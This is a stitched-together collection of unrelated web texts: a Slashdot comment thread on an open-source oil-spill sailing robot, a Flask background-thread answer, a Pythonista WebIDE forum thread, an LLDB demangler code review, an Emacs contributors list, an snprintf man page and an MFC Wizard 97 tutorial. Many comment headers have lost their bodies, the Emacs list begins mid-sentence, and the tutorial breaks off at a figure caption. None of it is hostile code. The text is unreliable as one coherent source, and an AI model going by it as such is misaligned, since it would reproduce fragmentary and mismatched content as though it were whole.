An Autonomous Sailing Robot To Clean Up Oil Spills Roblimo posted more than 3 years ago | from the sailing-without-human-help dept. (4, Funny) fred911 (83970) | more than 3 years ago | (#35768990) .. are belong to us Re:All your oil slicks (-1) Anonymous Coward | more than 3 years ago | (#35769204) Crowd sourced! Collaborative! (0) Anonymous Coward | more than 3 years ago | (#35769012) This crowd sourced, open source hardware, collaboratively developed project could help prevent the tragedy of the next oil spill. Furthermore, it is a prime example of what people can do together when they collaborate, working together on the research and development, design, and funding. Be still, my beating heart! Re:Crowd sourced! Collaborative! (2) camperdave (969942) | more than 3 years ago | (#35769294) ...:Crowd sourced! Collaborative! (1) rDouglass (1068738) | more than 3 years ago | (#35769358) Re:Crowd sourced! Collaborative! (1) LifesABeach (234436) | more than 3 years ago | (#35769876) Grammar (1) Anonymous Coward | more than 3 years ago | (#35769022) Whoever wrote that copy needs to learn how to use a hyphen. Re:Grammar (5, Funny) rDouglass (1068738) | more than 3 years ago | (#35769048) OSHW (1) Yetihehe (971185) | more than 3 years ago | (#35769068) Or it guarantees that no one will make this in enough quantity, only 20 of them from 3 hackerspaces... Re:OSHW (0) Anonymous Coward | more than 3 years ago | (#35769150) Or, remediation companies wanting cheaper alternatives to their expensive boats and crews, outsource the manufacturing of these things. It may be open hardware, but the tooling, machinery, and manufacturing know how aren't. And even then, when one actually builds one of these, I can guarantee you that things that the designers never thought of and bugs in the design will pop up; which will become proprietary knowledge of said manufacturer. Oh yeah, PROFIT! 
Re:OSHW (4, Informative) Rich0 (548339) | more than 3 years ago | (#35769338):OSHW (-1) Anonymous Coward | more than 3 years ago | (#35769488) "It looks like it discharges cleaner water into the ocean." Bullshit. Quote, please. Re:OSHW (1) funwithBSD (245349) | more than 3 years ago | (#35773918) We are from the Government, and we are here to help. Re:OSHW (0) Anonymous Coward | more than 3 years ago | (#35775280) Where did you read this? This honestly sounds like you have been duped into repeating some dishonest, right-wing paranoia. I heard this story about cleanup ships being turned away, but it involved a different law and was an event fabricated out of whole cloth. I suspect that someone fabricated the story you have repeated as well because ships were not turned away. It sounds like reflexive, anti-government/anti-regulation propaganda. Re:OSHW (4, Insightful) Doc Ruby (173196) | more than 3 years ago | (#35769164) (4, Informative) mdfst13 (664665) | more than 3 years ago | (#35771424)] AAHAHAH!! (0) Servaas (1050156) | more than 3 years ago | (#35769070) Re:AAHAHAH!! (1) rDouglass (1068738) | more than 3 years ago | (#35769108) Re:AAHAHAH!! (1) Servaas (1050156) | more than 3 years ago | (#35769138) Re:AAHAHAH!! (1) rDouglass (1068738) | more than 3 years ago | (#35769160) Re:AAHAHAH!! (0) Anonymous Coward | more than 3 years ago | (#35769346) There is a solution: Reduce energy consumption, improve energy efficiency and use less catastrophic sources of energy. We choose not to implement this solution. Re:AAHAHAH!! (0) Anonymous Coward | more than 3 years ago | (#35772586) I know of a few organizations in Central and South America that may find some uses. Re:AAHAHAH!! (1) tzot (834456) | more than 3 years ago | (#35782916) >. (3, Interesting) rDouglass (1068738) | more than 3 years ago | (#35769090) Re:$150 pledge gives me more than just a hoodie. (1) RockDoctor (15477) | more than 3 years ago | (#35820806) Congratulations ; a positive contribution. 
It's news to me too, which annoys me more than a little as I work in the industry. But it doesn't particularly surprise me - the industry is notoriously discussion-of-risk averse. Not affiliated, except by being a funder? ... well, it's your slice of cake ; it's up to you to choose whether you wish to eat it. (But it doesn't keep!) Which one of the many was that? Oh, you mean the relatively recent one in the American Gulf, not the routine and continuing ones in the Persian Gulf, Caspian Sea, South China Sea, etc, etc ad nauseam. Let alone the many continuing leaks in and around ports, from small shipwrecks, etc. Or is this only a tool suitable for use in big events? It's an interesting technology. When did you sell your last car and revoke your driving license? How many flights are you foregoing this year and using video-conferencing instead? Does this week's food shopping have a lower food-miles bill than last week's shopping? Did I mention it's open sourced? (2) zill (1690130) | more than 3 years ago | (#35769094) ..:Did I mention it's open sourced? (2) rDouglass (1068738) | more than 3 years ago | (#35769186) Re:Did I mention it's open sourced? (0) Anonymous Coward | more than 3 years ago | (#35769440) People have to be told, repeatedly, and in demonstrable terms, that open source is important. Babbling incoherently about a mishmash of esoteric freetard jargon isn't going to convert anyone. Especially not those Silicon Valley execs. You saw Richard Stallman as an iconic visionary that they didn't get. They saw a looney hippie with ridiculous idealism and zealotry whose ideas are obviously unworkable for them. You're never going to see software companies suddenly "get it" en masse and open source everything they do, as Stallman desires. Most of them would go out of business because the only known successful profit models in Open Source only work for fairly narrow categories of software. Also, in what way is anything these people are doing important yet? 
They have made a few toy boats by processes which appear to involve precious little engineering. Great, they're having fun building odd RC models by the seat of their pants. Wake me up when they actually have a real world saving technology, by which I mean something full size that has proven its ability to not sink or be damaged by rough seas and has also proven its ability to usefully replace existing oil cleanup systems. You probably aren't actually an engineer, so you probably aren't aware that scaling problems and refining a concept technology (especially a somewhat out-there one like this) so that it is useful in practice are both enormous problems. They're not 90% there, they're not 50% there, they're probably not even 5% there, and they certainly haven't proven that they'll be able to get good results with more funding. But this FA tries to make it sound like it's a sure thing, or maybe already accomplished, and it's Super Awesome that Open Source Did This!!!! Re:Did I mention it's open sourced? (2) rDouglass (1068738) | more than 3 years ago | (#35769516) Re:Did I mention it's open sourced? (1) DerekLyons (302214) | more than 3 years ago | (#35771170) (4, Insightful) seepho (1959226) | more than 3 years ago | (#35769104) Re:Unsinkable (1) couchslug (175151) | more than 3 years ago | (#35769854) "Haven't we learned by now not to call any sort of seafaring vessel unsinkable?" No. Plastic? (1) Anonymous Coward | more than 3 years ago | (#35769122) the joy out of it. Worse, if you collect it, noone wants you to park in their port, since they think you might want to return (what is part of their problem) to them, and thats how the crap got out there in the first place. Re:Plastic? (1) HornWumpus (783565) | more than 3 years ago | (#35770154) Think about it. That's where these things will wind up floating dead if they are ever produced at all. BTW if you are sailing and competent you would stay in the trade winds and hence out of the patch. Re:Plastic? 
(2) jbengt (874751) | more than 3 years ago | (#35770580)

If you sailed through it, there's a decent chance you wouldn't notice it, as it is composed of small, widely dispersed particles. Which is just the size for pieces of plastic to cause problems for a lot of hungry sea life.

Cleaning Up the Appearance of Tragedy (4, Insightful) Doc Ruby (173196) | more than 3 years ago | (#35769152)

Re:Cleaning Up the Appearance of Tragedy (2) rDouglass (1068738) | more than 3 years ago | (#35769198)

Re:Cleaning Up the Appearance of Tragedy (1) hedwards (940851) | more than 3 years ago | (#35769210)

Re:Cleaning Up the Appearance of Tragedy (1) Doc Ruby (173196) | more than 3 years ago | (#35769954)

The problem is that what you just said is one of the stupidest things I've heard about an oil spill.

Re:Cleaning Up the Appearance of Tragedy (0) Anonymous Coward | more than 3 years ago | (#35769584)

Cleaning up below the surface with oxygen. (3, Interesting) nido (102070) | more than 3 years ago | (#357698

Re:Cleaning up below the surface with oxygen. (1) HornWumpus (783565) | more than 3 years ago | (#35770194)

to make the Chinese very nervous it might be a good idea. Then again, the Japanese might just trade the Chinese the Enterprise for a few ships built to spec.

Re:Cleaning up below the surface with oxygen. (1) nido (102070) | more than 3 years ago | (#35770334)

Re:Cleaning up below the surface with oxygen. (1) DerekLyons (302214) | more than 3 years ago | (#35771826)

FLMAO". In some universe where the US would even consider selling the Enterprise... that might be a useful endeavor. Here in the real universe, your letter will be filed where it belongs - in the recycling bin. In some universe where the Japanese have any experience fabricating HEU fuel, let alone refuelling the reactors - you'd have a good point. Here in the real universe the Japanese not only lack the infrastructure, they lack even a fraction of the relevant experience.
Just as I said the last time you posted this nonsense - you haven't the foggiest clue what you're talking about. We even engaged in a lengthy discussion where it appeared you might be interested in and capable of learning - but now the truth is apparent... you're an ignorant nutjob.

my fixation on the Enterprise is about marketing (1) nido (102070) | more than 3 years ago | (#35772122)

a retired LHA would be good. One of the posters at the USNI said LHA-1 is currently awaiting its fate as a target. Ideas of every type have to be marketed before they can be implemented, and "Send the USS Tarawa" doesn't market like Enterprise. :) Here's those links: [conflicthealth.com] [usni.org] I have a comment at each of those two links. I'll appreciate your response here.

Re:Cleaning up below the surface with oxygen. (1) RockDoctor (15477) | more than 3 years ago | (#35821216)

Well, it's compactly presented and has obviously had fair thought applied to it, so it deserves a reasoned response. Probably true. Unfortunately human nature isn't very good at giving a shit about things it can't see. You did say "effectively"; what's the undocking and sailing time for such a vessel from, for example, the USN docks on the West Coast to, for example, the source of much of America's energy in the Persian Gulf? A week, a month, six weeks? Having resources on "hot standby" has costs, real costs. What's the annual leakage of pollution (nuclear, chemical, biological) from a crewed carrier already? Let alone the actual operating cost? It's an idea; I don't think it's a particularly good one, but it's an idea. The Protei (wrong case, surely?), as an idea for a low-maintenance ocean-going platform, has a lot of interesting potentials. It might even be plausible to rapidly re-purpose one (or many) from their normal duties to perform clean-up.

An anonymous sailing robot??? (2) stevegee58 (1179505) | more than 3 years ago | (#35769258)

Oh. Nevar mind.
Wind Power (2, Interesting) Anonymous Coward | more than 3 years ago | (#35769362)

Why use wind power when there's all that juicy oil floating around??

the OTHER application of this... (2) 0WaitState (231806) | more than 3 years ago | (#35769432)

Re:the OTHER application of this... (1) popeyethesailorman (735746) | more than 3 years ago | (#35774206)

...?! (2) the_skywise (189793) | more than 3 years ago | (#35769522)

But will it still have trouble finding home base to recharge?!

How much for low cost? (3, Informative) Hairy1 (180056) | more than 3 years ago | (#35769632)

Re:How much for low cost? (1) rDouglass (1068738) | more than 3 years ago | (#35769706)

Re:How much for low cost? (1) Hairy1 (180056) | more than 3 years ago | (#35769936)

directed into developing systems to carry cargo. Think about cargo ships sailing into dangerous areas - such as those with pirates. If you have a ship that is autonomous, there are no lives to risk, and if boarded, the control systems could be buried under tons of cargo: impossible to reach, and with ability to control from on board. Such vessels would be controlled by satellite. They would of course need the software to run autonomously, including interfacing with radar, GPS, visual, etc. Another advantage with this approach would be that you could make them smaller, and make them sailing ships, or perhaps wind turbine or kite assisted. Plenty of possibilities to reduce the carbon emissions of international trade.

autonomy and liability (0) Anonymous Coward | more than 3 years ago | (#35771784)

I think the real problem with autonomous boats is the liability aspect. Admiralty and maritime law doesn't explicitly deal with this, so it's going to be very difficult to get insurance cover, and you'd basically wind up doing what cheap shippers do: use a flag of convenience and make sure there's no assets to sue for. There's several fairly good law-review-type articles discussing this issue out there on the web.
Nobody is going to pay for an autonomous ship that might run into a Disney cruise ship full of terminally ill children on their "make a wish" cruise.

Re:How much for low cost? (2) Zerth (26112) | more than 3 years ago | (#35772150)

So the pirates can just climb on, take the cargo, and sail off without anybody trying to stop them? Awesome.

Re:How much for low cost? (1) Hairy1 (180056) | more than 3 years ago | (#35779354)

can you say, "free parts". (0) Anonymous Coward | more than 3 years ago | (#35770262)

How are they planning on protecting these anonymous devices on the high seas? Can it dive for long periods of time?

Not enough power generation (1) nonsequitor (893813) | more than 3 years ago | (#35771658)

? (1) Billy the Mountain (225541) | more than 3 years ago | (#35772354)

Another, more informative video (2) rDouglass (1068738) | more than 3 years ago | (#35772676)

Dear Subby (0) AP31R0N (723649) | more than 3 years ago | (#35774276)
How do you add a background thread to Flask in Python?

The example below creates a background thread that executes every 5 seconds and manipulates data structures that are also available to Flask routed functions.

import threading
import atexit
from flask import Flask

POOL_TIME = 5  # Seconds

# variables that are accessible from anywhere
commonDataStruct = {}
# lock to control access to variable
dataLock = threading.Lock()
# thread handler
yourThread = threading.Thread()

def create_app():
    app = Flask(__name__)

    def interrupt():
        global yourThread
        yourThread.cancel()

    def doStuff():
        global commonDataStruct
        global yourThread
        with dataLock:
            pass  # Do your stuff with commonDataStruct here
        # Set the next thread to happen
        yourThread = threading.Timer(POOL_TIME, doStuff, ())
        yourThread.start()

    def doStuffStart():
        # Do initialisation stuff here
        global yourThread
        # Create your thread
        yourThread = threading.Timer(POOL_TIME, doStuff, ())
        yourThread.start()

    # Initiate
    doStuffStart()
    # When you kill Flask (SIGTERM), clear the trigger for the next thread
    atexit.register(interrupt)
    return app

app = create_app()

Call it from Gunicorn with something like this:

gunicorn -b 0.0.0.0:5000 --log-config log.conf --pid=app.pid myfile:app
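An alternative to re-arming a Timer on every tick is a single daemon thread that loops. Below is a minimal, hedged sketch of that pattern using only the standard library; the names (poll_loop, shared_data) are illustrative, and the Flask app itself is omitted since the pattern is independent of it:

```python
import threading
import time

shared_data = {"ticks": 0}      # state shared with request handlers
data_lock = threading.Lock()    # guards shared_data
stop_event = threading.Event()  # lets us shut the worker down cleanly

def poll_loop(interval=0.01):
    # Loop until asked to stop; Event.wait() doubles as an
    # interruptible sleep, so shutdown is prompt.
    while not stop_event.is_set():
        with data_lock:
            shared_data["ticks"] += 1
        stop_event.wait(interval)

worker = threading.Thread(target=poll_loop, daemon=True)
worker.start()

time.sleep(0.05)  # stand-in for the app's lifetime
stop_event.set()  # request shutdown (e.g. from an atexit hook)
worker.join()
print(shared_data["ticks"] > 0)  # True
```

Compared to the Timer approach above, there is only one thread for the whole app lifetime and no re-arming step to forget.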
WebIDE

The other day I was going to work on a program on my iPad, while sitting next to my laptop. It seemed silly to be writing on an on-screen keyboard when I had a nice keyboard right next to me. Codea has a feature called AirCode, which starts up a web server on the iPad that lets you connect using a computer, write code in a browser, and save it to the iPad when you're done. I made something like this using bottle for Pythonista. It doesn't work on my iPad because I have an old version of Pythonista (my iPad can only run iOS 5.1.1), but I have tested it on an iPod with the latest version of Pythonista. If anyone has any suggestions or bug reports, I'd be glad to hear them. Also, if anyone has any idea why it doesn't work on old Pythonista, I'd really appreciate help. GitHub project here: .

- Webmaster4o

@dgelessus Maybe, I've never noticed that in Finder. This isn't really the main functionality of Transmit, it's a general-purpose FTP client, but I certainly appreciate this feature, as it works absolutely seamlessly.

Yeah, I'm pretty sure OS X has the ability to mount an FTP server like a flash drive natively. Anyways, it should be pretty trivial to make an FTP server in Pythonista, using something like this: python ftp server example

Finally tried this, and I have to say: Very cool idea and impressive implementation! Thanks for sharing! I wonder if it might be possible to run the server on a background thread, so that it doesn't block the interpreter, and it would be possible to add a "Run" button in the web interface... Another interesting addition might be Bonjour support via objc_util (NSNetService or something). I don't really have experience with this, so I don't know how hard that would be, but when using Safari on a Mac, you wouldn't have to know the IP address of the iOS device...

- Webmaster4o

@omz From when I've used Bonjour, it's really quite cool. The VNC app I use supports it out of the box, and it's really neat.
With no prior setup, I can VNC into my MacBook from my iPad, and I don't have anything running on the MacBook. They kind of just magically discover each other :)

I've implemented Bonjour support, see my pull request. This way, "Pythonista WebIDE" automagically shows up in Safari's bookmarks menu when it's running. You may need to enable the Bonjour menu in Safari's Advanced preferences.

- AtomBombed

This is awesome. Thanks for making this. Now I just need to figure out a way to access it at my school computers.

to run the server on a background thread, so that it doesn't block the interpreter,

I tried to run it under the famous Stash shell, but Stash only supports Python 2, and this is for Python 3.

File "...WebIDE.py"
    with open(fullname, encoding = 'utf-8', mode = 'r') as in_file:  # Open the file...
TypeError: 'encoding' is an invalid keyword argument for this function

So the problem is the function open. After googling, I added some lines like this:

import sys
if sys.version_info.major == 2:
    import codecs
    open = codecs.open

Now it's compatible with both Python 2 and 3. Another little modification to support UTF-8 editing: change

def submit():  # This function will get called for each POST request to /
    ...
    f.write(request.forms.get('code').replace('\r', ''))  # And dump our code into it

to:

f.write(request.forms.code.replace('\r', ''))

If you use the alternative direct property access request.query.q or forms.q, Bottle will give you Unicode strings instead, decoded from the byte version using UTF-8. It's usually best to work with these Unicode strings wherever you can.
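The background-thread idea raised above can be sketched with nothing but the standard library. This is a hedged illustration of the general pattern, not Pythonista- or bottle-specific (the handler text and the use of port 0 are arbitrary choices):

```python
import threading
import urllib.request
from http.server import HTTPServer, BaseHTTPRequestHandler

class Handler(BaseHTTPRequestHandler):
    def do_GET(self):
        body = b"hello from the background server"
        self.send_response(200)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):
        pass  # keep the interactive console quiet

server = HTTPServer(("127.0.0.1", 0), Handler)  # port 0: OS picks a free port
thread = threading.Thread(target=server.serve_forever, daemon=True)
thread.start()  # the interpreter stays free for other work

url = "http://127.0.0.1:%d/" % server.server_address[1]
with urllib.request.urlopen(url) as resp:
    data = resp.read().decode()
print(data)

server.shutdown()
```

Because serve_forever() runs on a daemon thread, the main interpreter remains responsive, which is exactly what a "Run" button in the web interface would need.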
LLDB on Windows should now be able to demangle Linux/Android symbols. Also updated CxaDemangle.cpp to be compatible with MSVC. Depends on D9949, D9954, D10048.

Unless we have a specific reason not to (which nobody has spoken up about yet), I would prefer for this to be a standalone .cpp file which compiles to an object file, instead of a .inc file. I can't think of any reason not to do this, but +greg and ed maste in case there is something about their platforms which would necessitate it being an inline file.

Is there a reason why we didn't need these defines before but we need them now? In any case, LLVM has LLVM_NOEXCEPT, LLVM_CONSTEXPR, and LLVM_ALIGNAS, which all just do the right thing depending on the platform. Seems like we should use those instead.

This function is going to get a "Not all control paths return a value" warning. Can you fix that?

I think it's for the same reason that we're putting everything here in an anonymous namespace: to prevent collision with a system-defined __cxa_demangle. I guess we could also solve that problem by putting everything under lldb_private.

Do you know whether rebind, construct, and destroy are required for allocators by the STL standard, or is it just an MSVC quirk? If it's the former, I think we should try to upstream it to libcxxabi, and avoid changing it here.

What do you mean by "before"? The builtin demangler wasn't enabled for MSVC. I'll try to upstream the LLVM_* change to libcxxabi, so we don't have to change them in our copy.

I mean I see

+#define noexcept
+#define constexpr
+#define snprintf _snprintf
+#define alignas(X) __declspec(align(X))

but I don't see corresponding -'s from anywhere else in the diff. So it looks like this is new code, not moved from somewhere else. Unless I'm just missing something. But now that I think about it, it looks like it's just because all this was previously compiled out on Windows, and now it's being compiled on Windows.
Since we've inlined a copy of the code already anyway, personally I don't see anything wrong with making small changes like this just to get it to compile on all platforms. I mean, I wouldn't think it wise to change some of the actual logic of the demangling, but just adding decorators on functions to get it to compile would be OK, I would think? Others may disagree though :)

Yeah, the entire thing didn't compile on Windows before. Virgile Bello tried to add these in r205769 but was reverted by emaste in r205776 since it broke FreeBSD. I put these here because I think it's nicer to have minimal changes to the cxa_demangler copy.

Well, the thing is that in VS 2015 some of those features will start working, like constexpr. It would be nice to have those C++ features start working automatically once the LLVM macros are changed to reflect the new compiler versions.

We should make a .cpp + .h file instead of a .inc file.

Addressed review comments.

In D10040#178973, @zturner wrote:

Well the thing is that in VS 2015 some of those features will start working, like constexpr. It would be nice to have those C++ features start working automatically once the LLVM macros are changed to reflect the new compiler versions.

Sounds good to me.

It wasn't just FreeBSD broken originally but probably anyone using clang (or any non-MSVC compiler, perhaps). I think I was just the first to encounter the build failure.

I'm personally not a fan of the implicit bool cast (here and below); do we already use this approach elsewhere?
Many people have contributed code included in the Free Software Foundation's distribution of GNU Emacs. To show our appreciation for their public spirit, we list here in alphabetical order those who have written substantial portions. Others too numerous to mention have reported and fixed bugs, and added features to many parts of Emacs. We thank them for their generosity as well. This list is intended to mention every contributor of a major package or feature we currently distribute; if you know of someone we have omitted, please report that as a manual bug. More comprehensive information is available in the ChangeLog files, summarized in the file etc/AUTHORS in the distribution.

read-file-name input; mb-depth.el, display of minibuffer depth; button.el, the library that implements clickable buttons; face-remap.el, a package for changing the default face in individual buffers; and macroexp.el for macro-expansion. He also worked on an early version of the lexical binding code.

diff output.

locate command; find-lisp.el, an Emacs Lisp emulation of the find program; net-utils.el; and the "generic mode" feature.

eldoc-mode, a mode to show the defined parameters or the doc string for the Lisp function near point.

Calc, an advanced calculator and mathematical tool, since maintained and developed by Jay Belanger; complete.el, a partial completion mechanism; and edmacro.el, a package for editing keyboard macros.

alloca implementation.

intangible text property, and rearranged the structure of the Lisp_Object type to allow for more data bits.

find command-line.

refer (the troff version) and lookbib, and refbib.el, a package to convert those databases to the format used by the LaTeX text formatting package.

ediff, an interactive interface to the diff, patch, and merge programs; and Viper, another emulator of the VI editor.

dired-mode, with contributions by Lawrence R. Dodd. He also wrote ls-lisp.el, a Lisp emulation of the ls command for platforms that don't have ls as a standard program.
edebug debug code written using David Gillespie's Common Lisp support; and isearch.el, Emacs's incremental search minor mode. He also co-wrote hideif.el (q.v.).

ps-print (with Jim Thompson, Jacques Duthen, and Kenichi Handa), a package for pretty-printing Emacs buffers to PostScript printers; delim-col.el, a package to arrange text into columns; ebnf2ps.el, a package that translates EBNF grammar to a syntactic chart that can be printed to a PostScript printer; and whitespace.el, a package that detects and cleans up excess whitespace in a file (building on an earlier version by Rajesh Vaidheeswarran).

info-finder feature that creates a virtual Info manual of package keywords.

autoarg-mode, a global minor mode whereby digit keys supply prefix arguments; autoarg-kp-mode, which redefines the keypad numeric keys to digit arguments; autoconf.el, a mode for editing Autoconf files; cfengine.el, a mode for editing Cfengine files; elide-head.el, a package for eliding boilerplate text from file headers; hl-line.el, a minor mode for highlighting the line in the current window on which point is; cap-words.el, a minor mode for motion in "CapitalizedWordIdentifiers"; latin1-disp.el, a package that lets you display ISO 8859 characters on Latin-1 terminals by setting up appropriate display tables; the version of python.el used prior to Emacs 24.3; smiley.el, a facility for displaying smiley faces; sym-comp.el, a library for performing mode-dependent symbol completion; benchmark.el for timing code execution; and tool-bar.el, a mode to control the display of the Emacs tool bar. With Riccardo Murri he wrote vc-bzr.el, support for the Bazaar version control system.

dired commands on output from the find program; grep.el for running the grep command; map-ynp.el, a general purpose boolean question-asker; autoload.el, providing semi-automatic maintenance of autoload files.

calendar package.

#ifdef clauses.
ebrowse, the C++ browser; jit-lock.el, the Just-In-Time font-lock support mode; tooltip.el, a package for displaying tooltips; authors.el, a package for maintaining the AUTHORS file; and rx.el, a regular expression constructor.

PCL-CVS, a directory-level front end to the CVS version control system; reveal.el, a minor mode for automatically revealing invisible text; smerge-mode.el, a minor mode for resolving diff3 conflicts; diff-mode.el, a mode for viewing and editing context diffs; css-mode.el for Cascading Style Sheets; bibtex-style.el for BibTeX Style files; mpc.el, a client for the "Music Player Daemon"; smie.el, a generic indentation engine; and pcase.el, implementing ML-style pattern matching. In Emacs 24, he integrated the lexical binding code, cleaned up the CL namespace (making it acceptable to use CL functions at runtime), and added generalized variables to core Emacs Lisp.

mailto: URLs.

xwsh and winterm terminal emulators; and vc-dir.el, displaying the status of version-controlled directories. Daniel also rewrote apropos.el (originally written by Joe Wells), for finding commands, functions, and variables matching a regular expression; and, together with Jim Blandy, co-authored wyse50.el, support for Wyse 50 terminals. He also co-wrote compile.el (q.v.) and ada-stmt.el.

etags program.

load-history Lisp variable, which records the source file from which each Lisp function loaded into Emacs came.

telnet sessions within Emacs.

eshell, a command shell implemented entirely in Emacs Lisp. He also contributed to Org mode (q.v.).

man command.
snprintf(3) - safe sprintf

#include <slack/std.h>
#ifndef HAVE_SNPRINTF
#include <slack/snprintf.h>
#endif

int snprintf(char *str, size_t size, const char *format, ...);
int vsnprintf(char *str, size_t size, const char *format, va_list args);

Safe version of sprintf(3) that doesn't suffer from buffer overruns.

int snprintf(char *str, size_t size, const char *format, ...)

Writes output to the string str, under control of the format string format, which specifies how subsequent arguments are converted for output. It is similar to sprintf(3), except that size specifies the maximum number of characters to produce. The trailing nul character is counted towards this limit, so you must allocate at least size characters for str. If size is zero, nothing is written and str may be null. Otherwise, output characters beyond the (size-1)st are discarded rather than being written to str, and a nul character is written at the end of the characters actually written to str. If copying takes place between objects that overlap, the behaviour is undefined.

On success, returns the number of characters that would have been written had size been sufficiently large, not counting the terminating nul character. Thus, the nul-terminated output has been completely written if and only if the return value is non-negative and less than size. On error, returns -1 (i.e. encoding error).

Note that if your system already has snprintf(3) but this implementation was installed anyway, it's because the system implementation has a broken return value. Some older implementations (e.g. glibc-2.0) return -1 when the string is truncated rather than returning the number of characters that would have been written had size been sufficiently large (not counting the terminating nul character) as required by ISO/IEC 9899:1999(E).

int vsnprintf(char *str, size_t size, const char *format, va_list args)

Equivalent to snprintf(3) with the variable argument list specified directly as for vsprintf(3).
MT-Safe - provided that the locale is only set by the main thread before starting any other threads.

How long is a piece of string?

    #include <slack/std.h>
    #ifndef HAVE_SNPRINTF
    #include <slack/snprintf.h>
    #endif

    int main(int ac, char **av)
    {
        char *str;
        int len;

        len = snprintf(NULL, 0, "%s %d", *av, ac);
        printf("this string has length %d\n", len);

        if (!(str = malloc((len + 1) * sizeof(char))))
            return EXIT_FAILURE;

        len = snprintf(str, len + 1, "%s %d", *av, ac);
        printf("%s %d\n", str, len);

        free(str);
        return EXIT_SUCCESS;
    }

Check if truncation occurred:

    #include <slack/std.h>
    #ifndef HAVE_SNPRINTF
    #include <slack/snprintf.h>
    #endif

    int main()
    {
        char str[16];
        int len;

        len = snprintf(str, 16, "%s %d", "hello world", 1000);
        printf("%s\n", str);

        if (len >= 16)
            printf("length truncated (from %d)\n", len);

        return EXIT_SUCCESS;
    }

Allocate memory only when needed to prevent truncation:

    #include <slack/std.h>
    #ifndef HAVE_SNPRINTF
    #include <slack/snprintf.h>
    #endif

    int main(int ac, char **av)
    {
        char buf[16];
        char *str = buf;
        char *extra = NULL;
        int len;

        if (!av[1])
            return EXIT_FAILURE;

        if ((len = snprintf(buf, 16, "%s", av[1])) >= 16)
            if ((extra = malloc((len + 1) * sizeof(char))))
                snprintf(str = extra, len + 1, "%s", av[1]);

        printf("%s\n", str);

        if (extra)
            free(extra);

        return EXIT_SUCCESS;
    }
If the local system can support %[aA], then you must have C99 already and so you must also have snprintf(3) already. If snprintf(3) or vsnprintf(3) require more than 512 bytes of space in which to format a floating point number, but fail to allocate the required space, the floating point number will not be formatted at all and processing will continue. There is no indication to the client that an error occurred. The chances of this happening are remote. It would take a field width or precision greater than the available memory to trigger this bug. Since there are only 15 significant digits in a double and only 18 significant digits in an 80 bit long double (33 significant digits in a 128 bit long double), a precision larger than 15/18/33 serves no purpose and a field width larger than the useful output serves no purpose. printf(3), sprintf(3), vsprintf(3) 2002-2010 raf <raf@raf.org>, 1998 Andrew Tridgell <tridge@samba.org>, 1998 Michael Elkins <me@cs.hmc.edu>, 1998 Thomas Roessler <roessler@guug.de>, 1996-1997 Brandon Long <blong@fiction.net>, 1995 Patrick Powell <papowell@astart.com>
Everybody knows what a Wizard is. However, for the sake of those who don't, a short introduction below gives the answer to the mysterious question: "What is a Wizard?" Those of you who feel you know the answer can skip to the next section. A Wizard is one of the well-known GUI elements that guides a user, step by step, through an entire process. It consists of a series of dialogs that run, one by one, inside a frame window. A Wizard has buttons to navigate through the pages forward and back, and buttons that allow the user to commit or cancel the process. From the Win32 API programming point of view, a Wizard is a PropertySheet control that contains several pages, which are actually PropertyPage controls. So basically, a Wizard is much the same as a PropertySheet control, but it allows the user to access only one page at a time. That's why its implementation in the Win32 API is the same as for a PropertySheet control. The only thing that has to be done is to define the flag PSH_WIZARD during the creation of a PropertySheet control. PropertySheet PropertyPage PropertySheet PSH_WIZARD A typical example of a Wizard is displayed in Fig. 1. Fig. 1. The typical view of a Wizard page Together with a new style of Internet Explorer, Microsoft has presented a new fashion in Wizard design - the so-called Wizard 97. Since version 5.80, the common control library supports new stylized elements for the Wizard, such as a header with title and subtitle, and watermarks (see Fig. 2). To enable such features, a programmer should just provide a PSH_WIZARD97 flag instead of PSH_WIZARD during creation of a PropertySheet control. PSH_WIZARD97 Fig. 2. An example of the Wizard 97 page with header It's a shame to just pass by such a nice feature of the new common control library, when the implementation is so easy.
First of all, be aware that one should never try to implement something if it has already been done by someone else and already exists somewhere. Life is too short to repeat the same mistakes and rewrite the code. One must not "reinvent the wheel". So the first step is to research existing examples of using Wizard 97. The main sources for that in our case are

If one were ever to look for examples of using Wizard 97, one would be astonished by the results of such an exploration. There are unexpectedly few of them! The most useful links are

The analysis of these samples yields a set of conclusions:

CPropertySheetEx CPropertyPageEx CPropertySheet CPropertyPage CDialog

So, it seems like we have to "reinvent the wheel" after all, although it has almost certainly been already done by someone else. The evidence of this is all around us. There we go! Let's create our own example for Wizard 97 using the MFC 7 class library. The sky is bright and the road is clear. In MSDN, it is written that all the functionality of Wizard 97 is inside two nice basic wrappers, CPropertySheet and CPropertyPage. So all we have to do is write just a few lines of code.

Start a new project, let's say Wiz97, which is a dialog-based application to keep things simple. The wizard we'll create contains two pages: the first one for testing the watermark feature (introduction page), and the second one to use a header with a title and subtitle. There are two dialogs in the resource, two classes based on CPropertyPage, and one class that inherits from CPropertySheet. Also prepare two bitmaps - a small icon for the header and a big picture for the watermark of the first page. Following the example from the MSDN, the constructors of the classes should be modified as shown below:

...
// Modified constructor of the first page (with watermark)
CFirstPage::CFirstPage() : CPropertyPage(CFirstPage::IDD)
{
    m_psp.dwFlags |= PSP_DEFAULT | PSP_HIDEHEADER;
}
...
// Modified constructor of the second page (with banner, title and subtitle)
CSecondPage::CSecondPage() : CPropertyPage(CSecondPage::IDD)
{
    m_psp.dwFlags |= PSP_DEFAULT | PSP_USEHEADERTITLE | PSP_USEHEADERSUBTITLE;
    m_psp.pszHeaderTitle = _T("Title");
    m_psp.pszHeaderSubTitle = _T("And subtitle");
}
...
// Modified constructor of the property sheet class
CWiz97::CWiz97(UINT nIDCaption, CWnd* pParentWnd, UINT iSelectPage)
    : CPropertySheet(nIDCaption, pParentWnd, iSelectPage)
{
    SetWizardMode();
    // Wizard 97 flags and watermark/header bitmaps are set here;
    // the exact lines were lost in extraction, but typically:
    m_psh.dwFlags |= PSH_WIZARD97 | PSH_WATERMARK | PSH_HEADER;
    m_psh.pszbmWatermark = MAKEINTRESOURCE(IDB_WATERMARK); // IDs illustrative
    m_psh.pszbmHeader = MAKEINTRESOURCE(IDB_HEADER);
}

To start a Wizard we just need to add a couple of lines of code - that's the power of MFC we were expecting:

#include "Wiz97.h"
...
void CWiz97_1Dlg::OnBnClickedButton1()
{
    CWiz97 dlg(_T("Wizard 97"));
    dlg.DoModal();
}

So we are ready for the first bunch of errors. Compile, run, and the first result is here.

Fig. 3. The first page was supposed to contain a watermark, the second header expected an icon

